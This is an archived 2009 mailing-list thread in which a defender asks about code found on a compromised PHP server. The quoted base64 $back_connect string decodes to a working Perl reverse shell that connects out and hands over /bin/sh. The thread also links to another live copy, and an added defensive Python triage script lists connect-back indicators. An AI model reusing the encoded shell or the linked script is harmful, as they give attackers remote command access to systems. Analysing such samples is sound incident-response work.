Penetration Testing mailing list archives
Re: connect back PHP hack
From: "sr." <staticrez () gmail com>
Date: Tue, 10 Feb 2009 14:34:37 -0500
I really appreciate all of the responses. This is what community is all about. I'd seen the "==" in other encoding schemes, but just wasn't sure and wanted a quick response... thanks to everyone who responded! I'll post the rest of my findings on here asap.

I'm looking into an old compromised machine. This is nothing new... whoever mentioned the r57 shell, you're probably right, as the script connects to a remote box @ port 11457. This is r57 behaviour. I also found a copy of the same script I'm dissecting on someone else's box, you can check it out here: http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php

In my case, a bunch of PHP files were modified. I'll zip everything up and host it so you can all analyze...

thx,
sr. aka "fabrizio siciliano"

On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop () gmail com> wrote:
> "Sr."
>
> This is base64 encoded.
>
> 2009/2/10 sr. <staticrez () gmail com>:
>
>> Can anyone tell me what encoding this is?
>>
>> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>>
>> This has to do with an old PHP 4.x.x version with magic quotes enabled. I'm just trying to figure out what the connect back code does. Any input is much appreciated.
>>
>> thx,
>> sr.
>
> --
> Saludos,
> Gustavo Castro Puig.
> E-Mail: gcastrop () gmail com
> LPI Level-1 Certified (https://www.lpi.org/es/verify.html LPID:LPI000042304 Verification Code: hp6re8w5qg )
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ D++ G++ e++ h--- r y+++
> ------END GEEK CODE BLOCK------
> Registered Linux User #69342
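A defender's triage pass for the kind of modified PHP file this thread is about, added here as an example and not code from any poster: it pulls quoted base64 literals out of PHP source (tolerating the whitespace that mail and HTML wrapping insert, as in the blob quoted above), decodes them, and reports which connect-back tokens the plaintext contains so a long literal can be classified without reading it by hand. The sample PHP, the indicator list and the `decode_b64` / `triage_php_source` names are constructed for the example; the decoded sample is marker text, not the script from the thread.

```python
import base64
import binascii
import re

# Tokens that separate a connect-back script from an embedded image or serialized config
# in decoded data. Assumption: this list is constructed for the example.
INDICATORS = {
    "perl shebang": "#!/usr/bin/perl",
    "socket module": "use Socket",
    "outbound connect": "connect(",
    "stdio redirected to socket": ">&SOCKET",
    "command execution": "system(",
    "shell spawn": "/bin/sh",
}
# Quoted literal of 40+ base64-alphabet chars (whitespace allowed) plus optional '=' padding.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/\s]{40,}={0,2})["\']')

def decode_b64(candidate):
    """Return decoded ASCII text, or None if not valid base64 or the payload is binary."""
    compact = re.sub(r"\s+", "", candidate)  # undo wrapping inserted by mail clients or HTML
    if len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage_php_source(php_source):
    """List each decodable base64 literal with the indicator names found in its plaintext."""
    findings = []
    for match in B64_LITERAL.finditer(php_source):
        text = decode_b64(match.group(1))
        if text is None:
            continue  # binary or not base64 at all: not a script
        hits = sorted(name for name, token in INDICATORS.items() if token in text)
        findings.append({"offset": match.start(), "indicators": hits, "suspicious": len(hits) >= 3})
    return findings

# Constructed sample file: a benign DSN, a binary PNG header, and a wrapped literal whose
# plaintext is marker text carrying the indicator tokens (not a working script).
DSN_B64 = base64.b64encode(b"driver=mysql;host=localhost;dbname=app;charset=utf8").decode()
PNG_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(40)).decode()
MARKER_B64 = base64.b64encode(b"#!/usr/bin/perl\r\nuse Socket;\r\n# constructed marker text, "
                              b"not a script:\r\n# connect( >&SOCKET system( /bin/sh\r\n").decode()
SAMPLE_PHP = ('<?php\n$dsn = "%s";\n$logo = "%s";\n$back_connect = "%s";\n'
              % (DSN_B64, PNG_B64, MARKER_B64[:60] + "\n" + MARKER_B64[60:]))

if __name__ == "__main__":
    for finding in triage_php_source(SAMPLE_PHP):
        print(finding)
```

The binary PNG literal is dropped because it does not decode to text, the DSN decodes but matches nothing, and only the wrapped third literal is flagged.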
Current thread:
- connect back PHP hack sr. (Feb 10)
- Re: [Full-disclosure] connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Steffen Wendzel (Feb 10)
- Message not available
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack David Howe (Feb 12)
- Re: connect back PHP hack sr. (Feb 10)